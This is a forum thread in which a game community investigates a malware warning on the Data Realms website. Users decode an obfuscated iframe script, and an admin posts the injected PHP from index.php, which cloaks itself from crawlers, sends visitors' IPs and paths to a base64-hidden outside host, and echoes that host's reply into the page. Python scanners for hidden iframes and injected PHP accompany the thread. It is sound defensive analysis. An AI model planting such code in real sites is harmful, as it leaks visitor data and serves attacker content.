Data Realms Fan Forums
http://forums.datarealms.com/

DataRealms Website Malware Warning
http://forums.datarealms.com/viewtopic.php?f=48&t=31195
Page 2 of 3

Author:  Dauss [ Mon Jun 11, 2012 4:01 pm ]
Post subject:  Re: DataRealms Website Malware Warning

Well, this isn't any good, is it?

Author:  TheLastBanana [ Wed Jun 13, 2012 2:28 am ]
Post subject:  Re: DataRealms Website Malware Warning

As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM.

Author:  NikolaiLev [ Wed Jun 13, 2012 2:48 am ]
Post subject:  Re: DataRealms Website Malware Warning

Wish I could help, all I can do is point out problems though.

The warning is gone right now, that said.

Author:  NikolaiLev [ Thu Jun 21, 2012 10:37 am ]
Post subject:  Re: DataRealms Website Malware Warning

Uh oh. The warning is back again.

Author:  findude [ Sun Jun 24, 2012 1:21 pm ]
Post subject:  Re: DataRealms Website Malware Warning

http://pastebin.com/Y9rTWnzJ

Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch.
It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111",
the script src being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO".

Funny obfuscation.
It creates the strings "eval", "substring", "fromCharCode", "indexOf" and "charAt" from the variables, and calls them as functions.

I think the starting ifs break the script after it executes, removing it.

http://pastebin.com/QuWRS4Hd Here's my best-guess unobfuscation and cleanup.

The script then takes a substring and evals the decrypted code. http://pastebin.com/MLY8i1kG
I.e. exactly what Daman said.

Author:  NikolaiLev [ Sun Jun 24, 2012 6:01 pm ]
Post subject:  Re: DataRealms Website Malware Warning

Once again, the warning is gone, for now. Hopefully, for good.

Author:  scancode [ Sun Jun 24, 2012 8:38 pm ]
Post subject:  Re: DataRealms Website Malware Warning

If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code.

Site seems clean now.

Author:  findude [ Sun Jun 24, 2012 8:45 pm ]
Post subject:  Re: DataRealms Website Malware Warning

As already said, it seems to be happening once per IP or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes.
Or maybe it uses cookies.
I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides.

Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh.
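The frame findude describes was caught only because NoScript draws a block marker where an invisible iframe sits. The following scanner is an added example (it is not code from this thread or from Data Realms) that reproduces that check offline with Python's standard-library HTML parser: it reports every iframe that is sized to zero, hidden by CSS, or pushed off-screen, together with the host it points at. The sample page, the host `evil.example.invalid` and the path are constructed placeholders, not the values from the incident.

```python
"""Find hidden iframes in an HTML document (added example, not from the thread)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: one legitimate, visible embed and one injected frame that
# is zero-sized, display:none and positioned off-screen. Hostnames are placeholders.
SAMPLE_HTML = """
<html><body>
<h1>Forum index</h1>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<iframe src="http://evil.example.invalid/111" width="0" height="0"
        style="display:none; position:absolute; left:-9999px"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension_is_tiny(value):
    """True for width/height attributes of 0 or 1 pixel (e.g. "0", "1px")."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def hiding_reasons(attrs):
    """Return the list of ways this iframe is hidden from the visitor."""
    reasons = []
    if _dimension_is_tiny(attrs.get("width")) or _dimension_is_tiny(attrs.get("height")):
        reasons.append("zero-size")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    if "display:none" in style:
        reasons.append("display:none")
    if "visibility:hidden" in style:
        reasons.append("visibility:hidden")
    if re.search(r"(left|top):-\d{3,}px", style):
        reasons.append("off-screen")
    return reasons


def find_hidden_iframes(html):
    """Parse the page and return one finding per hidden iframe."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = hiding_reasons(attrs)
        if not reasons:
            continue  # visible frames are left alone
        src = attrs.get("src", "")
        findings.append({
            "src": src,
            "host": urlsplit(src).hostname or "",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe -> %s (%s)" % (f["src"], ", ".join(f["reasons"])))
```

The check does not follow the iframe's parents, so a frame hidden only by an ancestor's `display:none` is not reported; extending `IframeCollector` to track the open-tag stack would cover that case.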

Author:  scancode [ Sun Jun 24, 2012 10:11 pm ]
Post subject:  Re: DataRealms Website Malware Warning

Thanks for the info, findude.
Seems we had this stuck in index.php

Code:
<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // (annotation) Cloaking: this branch runs only when the user agent contains NONE of the
    // words below, so search-engine crawlers and Opera/Chrome/Safari users never get the payload.
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
            // (annotation) The base64 literal hides the remote host; the visitor's IP, user agent,
            // domain and requested path are sent to it in the query string.
            $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        // (annotation) Whatever the remote host answers is written into the page verbatim
        // (minus the leading "O" marker), which is how the hidden iframe got into index.php's output.
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

So it was getting the evil code from an external site. Time to audit security it seems!
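The injected block has three traits worth looking for across the rest of the site: the remote host is hidden in a base64_decode() literal, the request is only made for user agents that are not crawlers or certain browsers, and whatever the remote host returns is echoed straight into the page. The triage scanner below is an added example (not code from this thread, from phpBB or from Data Realms) that checks PHP source text for those traits and decodes any base64 literals so the contacted host shows up in the report. The sample is a shortened, constructed version of the posted snippet; the base64 literal in it is the one from the posted code, and the regexes are heuristics, not a PHP parser.

```python
"""Triage scanner for injected PHP of the kind found in index.php (added example)."""
import base64
import re

# Constructed sample modelled on the posted snippet; the base64 literal is the
# one from the thread, everything else is shortened.
SAMPLE_PHP = r"""<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
    $stCurlHandle = curl_init($stCurlLink);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O") { $sResult[0]=" "; echo $sResult; }
}
?>"""

CRAWLER_WORDS = ("google", "yahoo", "baidu", "msn", "bing", "bot")

# base64_decode('...') with a literal argument
B64_LITERAL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
# functions commonly used to pull content from another host at request time
FETCH_CALLS = re.compile(r"\b(curl_init|curl_exec|file_get_contents|fsockopen)\s*\(")


def decode_b64_literals(src):
    """Decode every base64_decode('...') literal that yields printable text."""
    out = []
    for enc in B64_LITERAL.findall(src):
        try:
            dec = base64.b64decode(enc, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # binary or malformed payloads are skipped, not reported
        if dec.isprintable():
            out.append(dec)
    return out


def scan_php(src):
    """Return the indicators found in one PHP file's source text."""
    low = src.lower()
    # user-agent cloaking: the UA is read and compared against crawler names
    ua_cloaking = "http_user_agent" in low and any(
        re.search(r"strstr\s*\([^)]*['\"]%s['\"]" % w, low) for w in CRAWLER_WORDS
    )
    remote_fetch = FETCH_CALLS.search(src) is not None
    # variables assigned from a fetch call that are later echoed into the page
    assigned = set(re.findall(
        r"(\$\w+)\s*=\s*@?\s*(?:curl_exec|file_get_contents)\s*\(", src))
    echoes_fetched = any(
        re.search(r"\becho\s+" + re.escape(v) + r"\b", src) for v in assigned
    )
    decoded = decode_b64_literals(src)
    remote_urls = [d for d in decoded if re.match(r"https?://", d)]
    score = sum([ua_cloaking, remote_fetch, echoes_fetched, bool(remote_urls)])
    return {
        "ua_cloaking": ua_cloaking,
        "remote_fetch": remote_fetch,
        "echoes_fetched": echoes_fetched,
        "decoded_strings": decoded,
        "remote_urls": remote_urls,
        "score": score,  # 0..4; anything >= 2 deserves a manual look
    }


if __name__ == "__main__":
    report = scan_php(SAMPLE_PHP)
    for key, value in report.items():
        print("%-16s %s" % (key, value))
```

Run it over every .php file under the web root (for example with `os.walk`) and sort by score; a legitimate stats plugin may use curl, but it will not also hide its host in base64 and echo the response unfiltered. Comparing file modification times against the last known-good deploy narrows the search further.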

Author:  Glowsticks [ Sun Jun 24, 2012 11:58 pm ]
Post subject:  Re: DataRealms Website Malware Warning

So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly?

Author:  TheLastBanana [ Mon Jun 25, 2012 5:17 am ]
Post subject:  Re: DataRealms Website Malware Warning

I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.

Author:  NikolaiLev [ Mon Jun 25, 2012 6:15 pm ]
Post subject:  Re: DataRealms Website Malware Warning

I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that.

But I'll send the PM if it happens again.

Author:  scancode [ Tue Jun 26, 2012 7:07 pm ]
Post subject:  Re: DataRealms Website Malware Warning

TheLastBanana wrote:
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.


The last little while being from May 20 onwards.

Author:  NikolaiLev [ Tue Jun 26, 2012 8:17 pm ]
Post subject:  Re: DataRealms Website Malware Warning

I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, namely Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.

Author:  scancode [ Tue Jun 26, 2012 10:35 pm ]
Post subject:  Re: DataRealms Website Malware Warning

NikolaiLev wrote:
I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, namely Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.


PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff.
